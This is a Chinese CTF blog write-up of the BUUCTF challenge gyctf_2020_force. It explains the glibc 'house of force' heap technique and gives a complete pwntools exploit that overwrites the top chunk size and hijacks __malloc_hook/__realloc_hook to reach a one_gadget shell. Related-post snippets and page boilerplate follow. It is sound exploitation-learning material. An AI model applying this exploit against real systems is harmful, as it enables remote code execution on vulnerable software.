gyctf_2020_force

最新推荐文章于 2024-11-14 23:59:53 发布
最新推荐文章于 2024-11-14 23:59:53 发布
阅读量95 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62887641/article/details/132484622
版权

gyctf_2020_force

house of force

做完这道题算是理解house of force 了,之前也没接触过,算是学到点新骚东西了

    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

64位 保护全开

看一下ida

主要是add,puts没啥用

unsigned __int64 sub_A20()
{
  const void **i; // [rsp+0h] [rbp-120h]
  __int64 size; // [rsp+8h] [rbp-118h]
  char s[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+118h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s, 255, sizeof(s));
  for ( i = (const void **)&unk_202080; *i; ++i )
    ;
  if ( (char *)i - (char *)&unk_202080 > 39 )
    exit(0);
  puts("size");
  read(0, nptr, 0xFuLL);
  size = atol(nptr);							//任意申请堆大小
  *i = malloc(size);
  if ( !*i )
    exit(0);
  printf("bin addr %p\n", *i);					//泄露堆地址
  puts("content");
  read(0, (void *)*i, 0x50uLL);					//溢出
  puts("done");
  return __readfsqword(0x28u) ^ v4;
}

size大小任意申请,然后还有个溢出,,只要我们申请的size小,就能通过read往下一个chunk写

可是没有edit和free,什么堆风水之类的都不行

搜集学习了一下 house of force 其实也还挺容易理解的

house of force 前提
能够申请任意大小size的chunk
有溢出修改top chunk
能够泄露top chunk的地址
libc2.23 2.27

本题都满足上述条件,上面的注释有

首先我们申请一个足够大的chunk,通过mmap分配,并且该chunk是在libc下面的,可以算出libc基地址

然后溢出将topchunk的size改成0xFFFFFFFFFFFFFFFF

因为涉及到topchunk并未对size进行细致检查(具体看源码),导致我们可以任意申请地址的chunk

然后申请到malloc执行onegadget

最后那个onegadget直接用malloc执行不了需要realloc

malloc_hook--->realloc_hook--->onegadget

exp

from pwn import*
from Yapack import *
libc=ELF('./libc-2.23.so')   
context(os='linux', arch='amd64',log_level='debug')
r,elf=rec("node4.buuoj.cn",25856,"./pwn",10)
 
leak=add(0x200000,b'ssss')+0x200ff0
li(leak)
malloc=leak+libc.sym['__malloc_hook']
realloc=leak+libc.sym['realloc']
one=leak+0x4526a
heap=add(0x18,p64(0)*3+p64(0xFFFFFFFFFFFFFFFF))+0x10
li(heap)
#此处的0x30是因为,申请到malloc_hook的地址上,因为chunk的结构前0x10是不能写的
#因为malloc_hook和realloc_hook是连着一起的,只差了0x8
#下面的a*8就是填充辣鸡数据,
#onegadget放到了realloc_hook,realloc放到了malloc_hook
add(malloc-heap-0x30,b'aaaa')
add(0x18,b'a'*8+p64(one)+p64(realloc+0x10))
#debug()
sl(b'1')
sl(b'20')

ia()

在这里插入图片描述

YameMres
关注
专栏目录
Pwn-gyctf_2020_force
fayinq的博客
03-13 420
gyctf_2020_force 这个题目是一个新的知识点,house_of_force,第一次看,以前没见过。 HOUSE_OF_FORCE: 使用条件: 能够使用溢出等手段,修改top_chunk的大小 能够自由分配chunk大小,不会被限制 基本原理: 在malloc之中,会有一个topchunk的size大小,如果说,能够malloc一个chunk的大小大于topchunk的大小(一般是0x20df1这种个大小),那么chunk就会去到vmmap映射出来的另一端地址,一般来说会在libc上面一点
House of force —— gyctf_2020_force
PLpa的博客
08-13 939
前言: House of force是属于House of xxx系列的利用方法,House of xxx是2004年《The Malloc Maleficarum-Glibc Malloc Exploitation Techniques》中提出的一系列针对glibc堆分配机制的利用方法。 想要利用House of force,需要以下条件: 1.能够以溢出等方式控制top chunk的size域。 2.能够自由的分配堆的大小 解题思路 保护机制 保护全开,64位。 IDA查看伪代码 程序有两个功能,
【house of forcegyctf_2020_force
huzai9527的博客
04-20 156
【house of forcegyctf_2020_force 1.ida分析 申请任意大小的堆块,存在堆溢出 2.思路 申请一个较大的堆块,泄露libc的地址 修改top chunk的地址为0xffffffffffffffff 计算top chunk到malloc_hook-0x33的距离(malloc_hook-0x23 是一个合法的chunk)其实这个0x30-0x37应该都可以,malloc在分配的时候会自己进行对齐 通过申请到malloc上方的chunk修改mall
BUUCTF-PWN gyctf_2020_force(house of force
weixin_44145820的博客
04-15 1434
目录程序分析漏洞分析漏洞利用EXP 程序分析 程序只有添加功能,puts功能没有用 添加功能中,有三个注意点 chunk大小没有限制 可以获得分配空间的地址 读入长度固定为0x50 漏洞分析 根据题目force,可以联想到house of force堆利用方法 以下内容取自ctf-wiki House Of Force 是一种堆利用方法,但是并不是说 House Of Force 必须...
使用innodb_force_recovery解决MySQL崩溃无法重启问题
09-10
在这种情况下,"innodb_force_recovery"是一个紧急恢复工具,可以用来尝试启动数据库服务,即使数据文件可能存在损坏。本篇文章将详细探讨如何利用这个参数来解决MySQL崩溃的问题,以及其背后的原理和潜在风险。 一...
gyctf_2020_force【write up】
m0_73756460的博客
04-11 151
BUUCTF刷题gyctf_2020_force【write up】
[BUUCTF]PWN——gyctf_2020_force(house of force
mcmuyanga的博客
01-29 1006
gyctf_2020_force 附件 步骤
BUUCTF【gyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 663
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的
i春秋2020新春战役PWN之force
seaaseesa的博客
02-26 826
House of force能够使我们将堆申请到任意地址,满足以下条件,即可达到利用 能够改写top chunk的size域 能够自由控制堆分配大小 能够知道目标地址与top chunk地址之间的距离(可以泄露地址,计算出偏移) 详细见CTF-WIKIhttps://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force...
gyctf_2020_borrowstack
qq_42728977的博客
04-12 579
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1666
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 319
PWN-PRACTICE-BUUCTF-24
GYCTF2020_Writeup
Lethe's Blog
03-15 2677
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
BUUCTF--[BJDCTF2020]JustRE
Hk_Mayfly的博客
04-07 1443
测试文件:https://www.lanzous.com/ib3dq9c 代码分析 1 BOOL __stdcall DialogFunc(HWND hWnd, UINT a2, WPARAM a3, LPARAM a4) 2 { 3 CHAR String; // [esp+0h] [ebp-64h] 4 5 if ( a2 != 272 ) 6 { ...
安全 Rust
最新发布
weixin_43219667的博客
11-14 353
这么做的缺点就是你只能靠自己了:如果不安全代码出错了,比如解引用空指针,可能会导致不安全的内存使用。为了尽可能隔离不安全代码,将不安全代码封装进一个安全的抽象并提供安全 API 是一个好主意,当我们学习不安全函数和方法时会讨论到。这里有五类可以在不安全 Rust 中进行而不能用于安全 Rust 的操作,它们称之为 “不安全的超能力。再者,unsafe 不意味着块中的代码就一定是危险的或者必然导致内存安全问题:其意图在于作为开发者你将会确保 unsafe 块中的代码以有效的方式访问内存。
【论文速读】| F2A:一种利用伪装安全检测智能体进行提示注入的创新方法
m0_73736695的博客
11-11 559
这篇论文研究了大语言模型(LLMs)在内容安全检测领域的广泛应用,尤其是其与安全检测代理结合后的盲目信任问题。作者提出了一种称为"伪造代理攻击"(Feign Agent Attack, F2A)的新型攻击手段,通过伪造的安全检测结果绕过LLM的防御机制,进而让LLM输出有害内容。
等保测评怎么做?具体流程是什么?
weixin_59571541的博客
11-14 502
等保是指对信息系统进行等级化保护管理,目的是提高信息系统的安全性,防止信息泄露、篡改、破坏等安全问题。在哈尔滨进行等保测评的具体流程大致是:需求分析与准备、自评、选择测评机构、现场评估、问题整改、编写报告、报告审核与备案、持续改进。2.选择等保等级:根据系统的性质、重要性、涉及的敏感信息等,选择合适的等保等级(从1级到5级)。1.明确测评范围:首先需要确定需要进行等保测评的系统范围,包括硬件、软件、网络架构等。3.准备工作:准备相关的文档资料,包括系统架构图、设备清单、安全管理规程、系统开发/运营情况等。
JWT深度解析:Java Web中的安全传输与身份验证
2401_85760095的博客
11-14 501
JSON Web Token(JWT)是一种轻量级的身份验证和授权标准,它允许在各方之间安全地传输信息。JWT作为一种安全传输信息和身份验证的解决方案,在Java Web开发中扮演着重要角色。它通过紧凑、自包含的方式传输用户信息,同时支持无状态和跨域认证,使得JWT成为现代Web应用中不可或缺的一部分。JWT是一种紧凑的、URL安全的令牌,用于在各方之间安全地传输信息。JWT的结构允许其轻松地在不同的系统之间传输,并且能被携带在URL的参数中,同时也支持在POST请求体中作为表单数据发送。
FileLink跨网文件安全摆渡系统——企业数据流转的安全桥梁
weixin_44264342的博客
11-11 976
随着企业信息化建设的不断推进,跨网文件传输的需求日益增长,FileLink跨网文件安全摆渡系统通过全方位的安全保障与高效传输能力,成为企业解决跨网文件传输难题的理想选择。无论是对数据的加密保护、权限管理、合规审计,还是对传输效率的优化,FileLink都能够提供全面的解决方案,确保文件在内外网之间的安全、高效流转。如果您的企业正面临跨网文件传输的挑战,不妨选择FileLink,让它成为您企业数据流转的安全桥梁,助力企业信息流通的高效性和安全性,为您的业务发展保驾护航。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值